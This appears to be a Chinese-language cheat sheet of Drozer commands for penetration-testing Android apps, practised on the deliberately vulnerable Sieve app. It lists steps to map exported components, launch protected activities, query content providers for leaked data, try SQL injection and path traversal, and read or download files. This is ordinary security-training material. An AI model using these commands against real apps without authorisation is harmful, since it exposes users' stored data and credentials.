获取安卓设备上的所有安卓的app信息
1 | run app.package.list |
获取sieve的一些基本信息
1 | run app.package.info -a com.mwr.example.sieve |
确定攻击面
1 | run app.package.attacksurface com.mwr.example.sieve |
exported表示组件可以被其他app利用
services is debugged 表示我们可以用adb绑定一个调试器到进程
获取activity组件信息
1 | run app.activity.info -a com. |
启动activity组件(测试越权)
1 | run app.activity.start —component com.mwr.example.sieve com.mwr.example.sieve.PWList |
获取contentprovider组件信息
1 | run app.provider.info -a |
查找可以访问content provider的URI(数据泄露)
1 | run scanner.provider.finduris -a com. |
从content url中获取数据
1 | run app.provider.query content://com.mwr —vertical |
进行sql注入
1 | run app.provider.query content://com. —-projection [select <projection> from xxxx] |
读取文件
1 | run app.provider.read |
下载文件
1 | run app.provider.download |
检测sql注入
1 | run scanner.provider.injection -a com. |
检测文件遍历
1 | run scanner.provider.traversal -a com. |
获取service组件信息
1 | run app.service.info -a com. |
向某个服务发送信息
1 | run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService —msg |
获取broadcast组件信息
1 | run app.broadcast.info -a com. |
